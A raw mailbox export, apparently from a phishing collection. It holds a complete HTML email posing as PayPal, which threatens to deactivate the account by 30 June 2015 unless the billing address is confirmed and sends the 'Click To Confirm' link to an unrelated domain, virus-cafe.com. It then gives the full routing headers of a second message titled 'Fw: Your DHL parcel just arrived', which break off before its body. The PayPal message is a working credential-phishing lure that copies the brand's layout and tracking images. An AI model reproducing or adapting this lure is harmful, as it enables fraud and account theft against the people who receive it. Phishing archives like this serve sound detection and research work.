From: "PayPal Service" <official@ail.com>
Subject: You just need to confirm your billing address.
To: jose@gcinter.com
Content-Type: text/html;iso-8859-1
Reply-To: official@ail.com
Date: Wed, 17 Jun 2015 21:51:53 -0700
X-Priority: 3
X-Library: Indy 8.0.25
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - sd.hosd.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - ail.com
X-Get-Message-Sender-Via: sd.hosd.com: authenticated_id: karem/only user confirmed/virtual account not confirmed
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 107

<div id="yui_3_7_2_1_1366036663675_1935" class="yiv1584300061ppmail"><style type="text/css">#yiv1584300061 #yiv1584300061emailWrapperTable h1, #yiv1584300061 #yiv1584300061emailWrapperTable h2 {font-family:Verdana, Arial;margin-bottom:2px;font-size:15px;}
#yiv1584300061 #yiv1584300061emailWrapperTable h3 {font-size:13px;}
#yiv1584300061 #yiv1584300061emailWrapperTable h4 {font-size:11px;}
#yiv1584300061 a {color:#084482;text-decoration:underline;}#yiv1584300061 a.yiv1584300061actionLink {color:#000;text-decoration:none;}
#yiv1584300061 hr {display:none;}
#yiv1584300061 .yiv1584300061small {font-size:10px;}
#yiv1584300061 .yiv1584300061ppid {color:#757575;}
#yiv1584300061 p {margin:11px 0;padding:0;}
</style>



<table id="yiv1584300061emailWrapperTable" style="font:11px Verdana, Arial, Helvetica, sans-serif;color:#333;" border="0" cellpadding="0" cellspacing="0" width="580"><tbody id="yui_3_7_2_1_1366036663675_1934"><tr id="yui_3_7_2_1_1366036663675_2006" valign="top"><td id="yui_3_7_2_1_1366036663675_2005" colspan="3"><table id="yui_3_7_2_1_1366036663675_2004" border="0" cellpadding="0" cellspacing="0" width="100%"><tbody id="yui_3_7_2_1_1366036663675_2003"><tr id="yui_3_7_2_1_1366036663675_2009" valign="top"><td id="yui_3_7_2_1_1366036663675_2008"><a id="yui_3_7_2_1_1366036663675_2007" rel="nofollow" target="_blank" href="https://www.paypal.com/us"><img id="yui_3_7_2_1_1366036663675_2010" src="http://imageshack.com/a/img543/1362/wnj3.gif" alt="PayPal" border="0"></a></td></tr><tr id="yui_3_7_2_1_1366036663675_2002"><td id="yui_3_7_2_1_1366036663675_2001"><img alt="" src="http://images.paypal.com/en_US/i/scr/pixel.gif" border="0" height="10" width="1"></td></tr><tr><td></td></tr></tbody></
 table></td></tr><tr id="yui_3_7_2_1_1366036663675_1943"><td id="yui_3_7_2_1_1366036663675_1942" colspan="3"><img id="yui_3_7_2_1_1366036663675_1941" src="http://images.paypal.com/en_US/i/scr/scr_emailTopCorners_580wx13h.gif" style="vertical-align:bottom;" alt="" border="0" height="13"></td></tr><tr id="yui_3_7_2_1_1366036663675_1933"><td style="background:left repeat-y;border-left:1px solid #ddd;" width="12"><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" alt="" border="0"></td><td id="yui_3_7_2_1_1366036663675_1932" class="yiv1584300061contentArea" style="width:530px;word-wrap:break-word;padding:12px;margin:0;" width="530"><table id="yui_3_7_2_1_1366036663675_1947" style="font:Verdana, Arial, Helvetica, sans-serif;" width="100%"><tbody id="yui_3_7_2_1_1366036663675_1946"><tr id="yui_3_7_2_1_1366036663675_1945"><td id="yui_3_7_2_1_1366036663675_1944"></td></tr></tbody></table><p id="yui_3_7_2_1_1366036663675_1931">Dear member,</p><p id="yui_3_7_2_1_1366036663675_1972">You 
 just need to confirm your billing address.</p><p id="yui_3_7_2_1_1366036663675_1973">If you did not confirm it until 30th of June 2015, Your account will be deactivated.</p><style type="text/css">#yiv1584300061 .yiv1584300061tips ul, #yiv1584300061 .yiv1584300061tips ol {margin-left:0;padding:4px 0 4px 20px;}
#yiv1584300061 .yiv1584300061tips ul li, #yiv1584300061 .yiv1584300061tips ol li {margin-left:0;padding-left:0;}</style>

<table id="yui_3_7_2_1_1366036663675_1977" class="yiv1584300061tips" style="border:1px solid #eee;font:11px Verdana, Arial, Helvetica, sans-serif;" cellpadding="10" cellspacing="0"><tbody id="yui_3_7_2_1_1366036663675_1976"><tr id="yui_3_7_2_1_1366036663675_1975"><td id="yui_3_7_2_1_1366036663675_1974" style="margin:0;font:11px Verdana, Arial, Helvetica, sans-serif;color:#333;">Just a reminder:<ul id="yui_3_7_2_1_1366036663675_1978"><li id="yui_3_7_2_1_1366036663675_1979">Never share your password with anyone.</li><li id="yui_3_7_2_1_1366036663675_1980">Never share your personal information with any one.</li><li id="yui_3_7_2_1_1366036663675_1981">Use different passwords for each of your online accounts.</li><li id="yui_3_7_2_1_1366036663675_1981">Be sure to include uppercase and lowercase letters, numbers, and symbols in your password.</li></ul></td></tr></tbody></table><p id="yui_3_7_2_1_1366036663675_1982">Sincerely,<br>PayPal</p><p>To get in touch with us</p><a target="_blank" hr
 ef="http://virus-cafe.com/cola/">Click To Confirm</a></td><td style="background:left repeat-y;border-right:1px solid #ddd;" width="12"><img src="http://images.paypal.com/en_US/i/scr/pixel.gif" alt="" border="0"></td></tr><tr id="yui_3_7_2_1_1366036663675_2000"><td id="yui_3_7_2_1_1366036663675_1999" colspan="3"><img id="yui_3_7_2_1_1366036663675_1998" src="http://imageshack.com/a/img547/1539/wo1v.gif" alt="" border="0" height="13"></td></tbody></table><table id="yiv1584300061emailFooter" style="padding-top:20px;font:10px Verdana, Arial, Helvetica, sans-serif;color:#333;"<tbody id="yui_3_7_2_1_1366036663675_1986"><tr id="yui_3_7_2_1_1366036663675_1985"><td id="yui_3_7_2_1_1366036663675_1984"><div id="yui_3_7_2_1_1366036663675_1983" class="yiv1584300061footerLinks" style="margin:5px 0;padding:0;"></div><p id="yui_3_7_2_1_1366036663675_1987">This email was sent by an automated system, so if you reply, nobody will see it.</p><p id="yui_3_7_2_1_1366036663675_1995"></p><img src="https://1
 02.112.2O7.net/b/ss/paypalglobal/1/G.4--NS/123456?pageName=system_email_PP1263" alt="" border="0" height="1" width="1"><img src="https://t.paypal.com/ts?ppid=PP1263&amp;cnac=US&amp;rsta=en_US&amp;e=op&amp;mchn=em&amp;s=ci&amp;mail=sys&amp;page=main:email::::::" alt="" border="0" height="1" width="1"><p id="yui_3_7_2_1_1366036663675_1996" class="yiv1584300061xptFooter yiv1584300061ppid" style=""></p></td></tr></tbody></table></div>

From noel@atcyork.com  Thu Jun 18 17:32:33 2015
Return-Path: <noel@atcyork.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id EB40EF40EB
	for <jose@login.monkey.org>; Thu, 18 Jun 2015 17:32:32 -0500 (CDT)
Received: from smtpin14.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id A8BA934E013
	for <jose@login.monkey.org>; Thu, 18 Jun 2015 22:32:32 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70313965344.14.sheet04_6d6e0880f3153
Authentication-Results: auth.b.hostedemail.com; dkim=permerror
	reason="key not found" header.d=atcyork.com header.i=@atcyork.com
	header.b=cPl46S/x; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,3,0,a4f5e981e47d0476,d41d8cd98f00b204,noel@atcyork.com,:,RULES_HIT:41:72:379:495:602:800:967:969:973:983:988:989:1208:1221:1254:1260:1263:1313:1314:1381:1431:1437:1516:1517:1518:1534:1541:1568:1575:1594:1699:1711:1714:1730:1777:1792:2196:2198:2199:2200:2525:2527:2528:2549:2560:2565:2682:2685:2737:2859:2899:2903:2909:2915:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3866:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4605:5007:6119:6120:6261:6653:6658:6678:6684:7652:7802:7901:7904:8513:8583:8603:8904:8957:8985:8987:9025:9080:9388:9973:10012:10044:10049:10215:10400:10482:11257:11473:11529:11656:11658:11914:12043:12438:12517:12519:12679:13025:13110:13137:13150:13230:13231:13846:14037:14039:14096:14347:19901:19997:21080:21121,0,RBL:error,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fs,MSBL:0,DNSBL:neutral,Custom_rules:0:3:0
X-HE-Tag: sheet04_6d6e0880f3153
X-Filterd-Recvd-Size: 4675
Received: from ara.arabian-mep.com (ara.arabian-mep.com [108.179.207.69])
	by imf23.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 18 Jun 2015 22:32:31 +0000 (UTC)
DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=atcyork.com; s=default;
	h=Date:From:To:Subject:MIME-Version:Content-Type; bh=WpXQLGBwbGepaCojn5dtzvx1Z+Ef50owQuLl5kkz5Gg=;
	b=cPl46S/xkiPTRf9LjR2ME3Qg7Y+u+Dejcp4XOHBFsCqxfcnorRZY3kYgCbevjWhwzd+B7hH28DeGTCO6Wq8rZKshzy4Klv5o0fb9qwp/iakoiC0vW6ReH/IhOg110TB+lHoYNqnIX15yTBevNMnqyGSWW9s95YZQchFCQvTmZWw=;
Received: from [45.58.114.237] (port=50376)
	by ara.arabian-mep.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.85)
	(envelope-from <noel@atcyork.com>)
	id 1Z5ZYd-0005BT-C8
	for jose@monkey.org; Thu, 18 Jun 2015 16:08:39 +0300
Content-Type: multipart/alternative; boundary="===============0414665287=="
MIME-Version: 1.0
Subject: Fw: Your DHL parcel just arrived
To: jose@monkey.org
